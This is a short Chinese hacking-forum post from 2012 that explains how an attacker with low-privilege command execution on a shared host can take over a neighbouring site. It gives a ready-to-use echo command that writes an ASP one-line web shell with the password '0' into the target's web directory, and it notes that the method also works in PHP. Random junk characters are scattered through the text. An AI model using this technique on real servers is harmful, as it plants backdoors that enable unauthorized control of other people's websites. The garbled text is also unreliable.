在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
$ _" \+ |. t" d9 ~( y# _- m' M% X. k4 j
命令格式1 D, j5 ?: W9 g0 B( S* r. {8 H* _4 S
+ P, z; Z7 S+ CEcho 语句 >目标站绝对目录9 H0 d" w8 R) `3 q9 [
) U7 a) W9 z& ?
例如: 2 @$ N; Y% j1 N
3 C" G( a6 h8 E8 `2 X6 m) {echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp# k8 Z1 |) N: Z5 Y; g
: e; L6 e9 z5 I& E
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
; p$ N( X! h7 p |
发表于 2012-9-23 14:40:24
收藏
支持
反对